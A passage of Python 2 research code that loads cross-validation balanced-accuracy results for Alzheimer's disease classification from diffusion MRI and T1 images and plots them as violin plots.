print "This combination has been classified, just skip: %s " % classification_dir
else:
pass
def classification_performances_violin_plot_imbalanced_vs_balanced(classification_result_path, tasks_imbalanced, tasks_balanced,
n_iterations, raw_classification=True, feature_type='voxel', modality='dwi', figure_number=0):
"""
This is a function to plot the classification performances among different tasks_imbalanced:
First subplot is to plot the three tissue combinations for each tasks_imbalanced for raw data classification
Second subplot is for balanced classifications.
:param classification_result_path: str, should be absolute path to the classification results.
:param tasks_imbalanced: list, containing several binary classification tasks_imbalanced
:param n_iterations: number of iterations to use for CV process
:param dwi_map: str, one of diffusion maps, e.g, fa
:return:
"""
if modality == 'dwi' and figure_number == 0:
results_balanced_acc_fa_imbalanced = []
results_balanced_acc_fa_balanced = []
results_balanced_acc_md_imbalanced = []
results_balanced_acc_md_balanced = []
if feature_type == 'voxel':
tissue_combinations = ['WM', 'GM', 'GM_WM']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
# ticklabels_imbalanced = ['CN vs AD', 'CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
ticklabels_balanced = [i.replace('_', ' ') for i in tasks_balanced]
# ticklabels_balanced = ['CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
if raw_classification == True:
print "Plot for original classifications"
## get FA
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path, task + '_VB_' + tissue + '_0.3_8', 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' +str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append((pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_fa_imbalanced.append(balanced_accuracy)
## get MD
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path, task + '_VB_' + tissue + '_0.3_8', 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append((pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_md_imbalanced.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_fa_imbalanced).transpose()
## define the violin's postions
pos = [1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15]
color = ['#FF0000', '#87CEFA', '#90EE90'] *len(tasks_imbalanced)# red, blue and green
legend = ['WM', 'GM', 'GM+WM']
## define the size of th image
fig, ax = plt.subplots(2,figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([2, 6, 10, 14])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: FA Voxel-based classifications', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_md_imbalanced).transpose()
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([2, 6, 10, 14])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: MDVoxel-based classifications', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'voxel_violin_imbalanced.png'), additional_artists=plt.legend, bbox_inches="tight")
else:
print "Plot for balanced classifications"
## get FA
for task in tasks_balanced:
for tissue in tissue_combinations:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced', task + '_VB_' + tissue + '_0.3_8', 'fa')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append((pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_fa_balanced.append(balanced_accuracy)
## get MD
for task in tasks_balanced:
for tissue in tissue_combinations:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced', task + '_VB_' + tissue + '_0.3_8', 'md')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append((pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_md_balanced.append(balanced_accuracy)
##### FA
### transfer the list into an array with this shape: n_iterations*n_tasks_balanced
metric = np.array(results_balanced_acc_fa_balanced).transpose()
## define the violin's postions
pos = [1, 2, 3, 5, 6, 7, 9, 10, 11]
color = ['#FF0000', '#87CEFA', '#90EE90'] *len(tasks_imbalanced)# red, blue and green
legend = ['WM', 'GM', 'GM+WM']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([2, 6, 10, 14])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: FA Voxel-based classification with balanced data', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_balanced
metric = np.array(results_balanced_acc_md_balanced).transpose()
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([2, 6, 10, 14])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: MD Voxel-based classification with balanced data', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'voxel_violin_balanced.png'), additional_artists=plt.legend, bbox_inches="tight")
else: ##### for DWI regions
atlases = ['JHUDTI81', 'JHUTracts25']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
# ticklabels_imbalanced = ['CN vs AD', 'CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
ticklabels_balanced = [i.replace('_', ' ') for i in tasks_balanced]
# ticklabels_balanced = ['CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
if raw_classification == True:
print "Plot for original classifications"
## get FA
for task in tasks_imbalanced:
for atlas in atlases:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_fa_imbalanced.append(balanced_accuracy)
## get MD
for task in tasks_imbalanced:
for atlas in atlases:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_md_imbalanced.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_fa_imbalanced).transpose()
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8, 10, 11]
# color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue
legend = ['JHULabel', 'JHUTract']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('C: FA Region-based classifications', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_md_imbalanced).transpose()
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('D: MD Region-based classifications', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'region_violin_imbalanced.png'), additional_artists=plt.legend,
bbox_inches="tight")
else:
print "Plot for balanced classifications"
## get FA
for task in tasks_balanced:
for atlas in atlases:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_RB_' + atlas, 'fa')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_fa_balanced.append(balanced_accuracy)
## get MD
for task in tasks_balanced:
for atlas in atlases:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_RB_' + atlas, 'md')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_md_balanced.append(balanced_accuracy)
##### FA
### transfer the list into an array with this shape: n_iterations*n_tasks_balanced
metric = np.array(results_balanced_acc_fa_balanced).transpose()
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8]
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue and green
legend = ['JHULabel', 'JHUTract']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[0].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('C: FA Region-based classification with balanced data', fontsize=15)
##### MD
### transfer the list into an array with this shape: n_iterations*n_tasks_balanced
metric = np.array(results_balanced_acc_md_balanced).transpose()
## define the size of th image
line_coll = ax[1].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[1].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('D: MD Region-based classification with balanced data', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'region_violin_balanced.png'), additional_artists=plt.legend,
bbox_inches="tight")
print 'finish DWI'
elif modality == 'T1':
results_balanced_acc_voxel_imbalanced = []
results_balanced_acc_regional_imbalanced = []
tissue_combinations = ['GM+WM']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
if raw_classification == True:
print "Plot for original classification, to compare T1 with DWI, we use GM+WM"
## T1
for task in tasks_imbalanced:
tsvs_path = os.path.join(classification_result_path, task + '_VB_T1_fwhm_8')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
## GM+WM FA
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path,
task + '_VB_' + tissue + '_0.3_8', 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
## GM+WM MD
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path,
task + '_VB_' + tissue + '_0.3_8', 'md')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_voxel_imbalanced.append(balanced_accuracy)
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_voxel_imbalanced).transpose()
## reorder the order of the column to make sure the right order in the image
metric_new = metric[:, [0, 4, 8, 1, 5, 9, 2, 6, 10, 3, 7, 11]]
## define the violin's postions
pos = [1, 2, 3, 5, 6, 7, 9, 10, 11, 13, 14, 15]
color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
legend = ['T1w+GM', 'DTI+GM+FA', 'DTI+GM+MD']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric_new, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([2, 6, 10, 14])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric_new, 0)
std = np.std(metric_new, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('A: Voxel-based classifications for T1w and diffusion MRI', fontsize=15)
### T1 atlaes
atlases_T1 = ['AAL2']
for task in tasks_imbalanced:
for atlas in atlases_T1:
tsvs_path = os.path.join(classification_result_path, task + '_RB_T1_' + atlas)
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
atlases_DTI = ['JHUDTI81']
## get DTI atlases FA
for task in tasks_imbalanced:
for atlas in atlases_DTI:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
#
# ## get DTI atlases MD
# for task in tasks_imbalanced:
# for atlas in atlases_DTI:
# tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'md')
# balanced_accuracy = []
# for i in xrange(n_iterations):
# result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
# if os.path.isfile(result_tsv):
# balanced_accuracy.append(
# (pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
# else:
# raise OSError(
# errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
# results_balanced_acc_regional_imbalanced.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_balanced_acc_regional_imbalanced).transpose()
## reorder the order of the column to make sure the right order in the image
metric_new = metric[:, [0, 4, 1, 5, 2, 6, 3, 7]]
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8, 10, 11]
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue and green
legend = ['T1w+AAL2', 'DTI+JHULabel+FA']
## define the size of th image
line_coll = ax[1].violinplot(metric_new, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[1].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[1].grid(axis='y', which='major', linestyle='dotted')
ax[1].set_xticks([1.5, 4.5, 7.5, 10.5])
ax[1].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[1].set_xticklabels(ticklabels_imbalanced, rotation=0, fontsize=15) # 'vertical'
ax[1].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric_new, 0)
std = np.std(metric_new, 0)
inds = np.array(pos)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[1].set_ylim(0.1, 1)
ax[1].set_title('B: Region-based classifications for T1w and diffusion MRI', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'violin_T1_compare_dwi.png'), additional_artists=plt.legend,
bbox_inches="tight")
#
print 'finish T1'
else:
pass
if figure_number == 3:
results_acc_fa_voxel = []
results_acc_md_voxel = []
results_acc_fa_region = []
if feature_type == 'voxel':
tissue_combinations = ['GM_WM']
ticklabels_imbalanced = [i.replace('_', ' ') for i in tasks_imbalanced]
# ticklabels_imbalanced = ['CN vs AD', 'CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
ticklabels_balanced = [i.replace('_', ' ') for i in tasks_balanced]
# ticklabels_balanced = ['CN_vs_MCI', 'CN_vs_pMCI', 'sMCI_vs_pMCI']
atlases = ['JHUDTI81']
print "Plot for figure 3"
## for region
## get FA region imbalanced
for task in tasks_imbalanced:
for atlas in atlases:
tsvs_path = os.path.join(classification_result_path, task + '_RB_' + atlas, 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_fa_region.append(balanced_accuracy)
## get FA region balanced
for task in tasks_balanced:
for atlas in atlases:
balanced_accuracy = []
tsvs_path = os.path.join(classification_result_path, 'RandomBalanced',
task + '_RB_' + atlas, 'fa')
for k in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(k), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_fa_region.append(balanced_accuracy)
##### FAs
### transfer the list into an array with this shape: n_iterations*n_tasks_imbalanced
metric = np.array(results_acc_fa_region).transpose()
metric = metric[:, [0, 3, 1, 4, 2, 5]]
## define the violin's postions
pos = [1, 2, 4, 5, 7, 8]
# color = ['#FF0000', '#87CEFA', '#90EE90'] * len(tasks_imbalanced) # red, blue and green
color = ['#FF0000', '#87CEFA'] * len(tasks_imbalanced) # red, blue
legend = ['JHULabel_raw', 'JHUTract_balanced']
## define the size of th image
fig, ax = plt.subplots(2, figsize=[15, 10])
line_coll = ax[0].violinplot(metric, pos, widths=0.5, bw_method=0.2, showmeans=True, showextrema=False)
for cc, ln in enumerate(line_coll['bodies']):
ln.set_facecolor(color[cc])
ax[0].legend(legend, loc='upper right', fontsize=10, frameon=True)
ax[0].grid(axis='y', which='major', linestyle='dotted')
ax[0].set_xticks([1.5, 4.5, 7.5])
ax[0].set_yticks([0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1.0])
ax[0].set_xticklabels(ticklabels_balanced, rotation=0, fontsize=15) # 'vertical'
ax[0].set_ylabel('Balanced accuracy', rotation=90, fontsize=15) # 'vertical'
mean = np.mean(metric, 0)
std = np.std(metric, 0)
inds = np.array(pos)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].vlines(inds, mean - std, mean + std, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean - std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].hlines(mean + std, inds - 0.1, inds + 0.1, color='k', linestyle='solid', lw=0.5)
ax[0].set_ylim(0.1, 1)
ax[0].set_title('C: FA Region-based classifications', fontsize=15)
plt.savefig(os.path.join(classification_result_path,
'figure3_C.png'), additional_artists=plt.legend,
bbox_inches="tight")
### for voxel
## get FA raw
for task in tasks_imbalanced:
for tissue in tissue_combinations:
tsvs_path = os.path.join(classification_result_path, task + '_VB_' + tissue + '_0.3_8', 'fa')
balanced_accuracy = []
for i in xrange(n_iterations):
result_tsv = os.path.join(tsvs_path, 'iteration-' + str(i), 'results.tsv')
if os.path.isfile(result_tsv):
balanced_accuracy.append(
(pd.io.parsers.read_csv(result_tsv, sep='\t')).balanced_accuracy[0])
else:
raise OSError(
errno.ENOENT, os.strerror(errno.ENOENT), result_tsv)
results_acc_fa_voxel.append(balanced_accuracy)
## get MD raw
